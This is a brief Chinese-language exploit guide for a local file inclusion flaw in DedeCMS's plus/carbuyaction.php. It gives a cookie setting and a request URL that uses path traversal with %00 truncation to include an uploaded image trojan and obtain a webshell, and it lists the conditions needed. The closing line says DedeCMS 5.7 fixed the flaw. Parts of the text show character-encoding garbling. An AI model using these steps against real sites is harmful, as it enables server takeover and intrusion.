1. 首先利用cookie修改工具，加上code=alipay然后訪問(wèn)
2. http://www.xxx.com/plus/carbuyaction.php?dopost=return&code=../../uploads/userup/xx/myface.gif%00
3. 直接包含成功
4. 利用條件為GPCOFF，或者某些環(huán)境下的截?cái)唷?/li>
5. 可以在會(huì)員中心里上傳個(gè)圖片木馬進(jìn)行拿shell。
6. 還可以包含dede自身文件進(jìn)行更多利用，這里就不詳細(xì)了。

現(xiàn)在最新版的DEDECMS5.7已經(jīng)修復(fù)了這個(gè)錯(cuò)誤，如果是早起的版本DEDECMS請(qǐng)用最新版文件覆蓋即可